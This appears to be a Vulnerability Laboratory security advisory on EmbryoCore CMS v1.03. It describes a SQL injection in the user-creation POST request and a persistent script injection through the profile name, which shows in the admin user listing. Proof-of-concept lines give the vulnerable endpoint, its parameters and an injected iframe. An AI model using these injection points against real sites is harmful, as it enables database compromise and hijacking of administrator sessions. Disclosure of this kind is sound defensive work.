Title: ====== EmbryoCore CMS v1.03 - Multiple Web Vulnerabilities Introduction: ============= EmbryoCore is a blog / content management system written using PHP5 s newest features. Highly customizable, XHTML:Strict compliant, with full integration of jQuery for dynamic ajax-powered content. Completely XHTML Strict compliant Pure CSS layouts Drag and drop interface for moving content around Static page and article entry for non-blog content Ajax comments system Ajax multi-page articles Ajax file manager with upload and auto-thumbnailing for images Ajax gallery system Post priviledges - every post can be configured to be seen by only guests, administrators, members etc Ratings and comments can be enabled or disabled on a per post basis Spam protection - configurable time-outs for disallowing posts within a certain time from visiting site and from last post made etc, also online post checking with TypePad AntiSpam Advanced theme templating system means you can change the look of your site with a single click, and building new themes is simplicity itself WYSIWYG editor for simple content entry Full categorization with sub-categories Cross blog communication with built in pingback Syndication with dynamic RSS creation for posts, comments etc Search engine friendly URL s Cache system reduces server load and speeds up page loads Automatic updating from the admin area Automatic installation of themes, plugins etc, no FTP access required Fully object orientated code Fully event driven Takes full advantage of PHP5 s new features Full integration with jQuery, including popular plugins like Shadowbox Uses PHP5 s inbuilt PDO (PHP Data Objects) class, and the powerful abstraction layer means building queries is a breeze Create as many sub-sites as you want from your admin area, all running off the same core code (Copy of the Vendor Homepage: http://embryocore.sourceforge.net/ ) Abstract: ========= The Vulnerability Laboratory Researcher Team discovered multiple Web Vulnerabilities in EmbryoCore v1.03. Details: ======== 1.1 A remote SQL Injection vulnerability (POST) is detected in EmbryoCore v1.03 content management system. The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands on the affected application dbms. Successful exploitation of the vulnerability results in dbms & application compromise. The vulnerability is located on the username post method. Vulnerable Module(s): [+] Add User or Register User Request (POST) [embryocore/index.php?event=admin:auser] --- SQL Exception Logs --- <div style=``display: none; opacity: 1;`` id=``kmessage`` class=``no-display``><img src=`` content/themes/admin/images/apply.png`` alt=``> <strong>EmbryoCore Fatal Database error:</strong> [42000]: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ``=> ``></div> 1.2 A persistent input validation vulnerability is detected in the EmbryoCore v1.03 web application. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action because the admin needs to watch the user list. The user includes his scriptcode as profile name and the code is getting executed on the administrator section persistent. Vulnerable Module(s): [+] Profil & Username Input Field [-] Admin Control Panel - User Listing Proof of Concept: ================= The sql injection vulnerability can be exploited by remote attackers without inter action or local low privileged user accounts. For demonstration or reproduce ... 1.1 To inject the sql command implement your statement on the user input fields and send it with the request (POST Method). The return will be the error or successful query of the application dbms. POST: /embryocore/index.php?ajax=admin:auser&mode=createNewUser HTTP/1.1 POC: user_displayname=[SQL-INJECTION]&user_login=test2&user_email=m () dot empire&user_password=123456&user_cpassword=hack4best 1.2 The persistent input validation vulnerability can be exploited by remote attackers without inter action or local low privileged user accounts. Successful exploitation requires low user inter action because the admin only have to review the user listing. For demonstration or reproduce ... User Listing PoC: <tr><td style="width: 1%; vertical-align: top;"><img src="http://www.gravatar.com/avatar.php?gravatar_id= 56f8d37b176ad6e9dc45e7923d1296ce&default=http%3A%2F%2Fxxx.com%2Fembryocore%2Flibs%2F modules%2Ftemplate%2Fimages%2Fdefault_gravatar.png" alt="gravatar" style="width: 45px;">​​​​​</td><td style=" width: 15%; vertical-align: top;"><div class="list-title"><strong>-2</strong></div>"><iframe src=" http://www.vulnerability-lab.com"; width"500"="" height="500"><br />91.37.89.26</td><td style=' width: 20%; vertical-align: top;'>Joined:<br />Monday 09th April 2012, 04:33am</td><td style='width: 20%; vertical-align: top;'>Last Visit:<br />-</td><td style='width: 20%; vertical-align: top;'>Last Post:<br />-</td><td style='width: 2%; vertical-align: top; text-align: right;'><img src='/img/uploadimg/20120417/1704031.png' alt='comments' title='comments' /> 0</td></tr> <tr>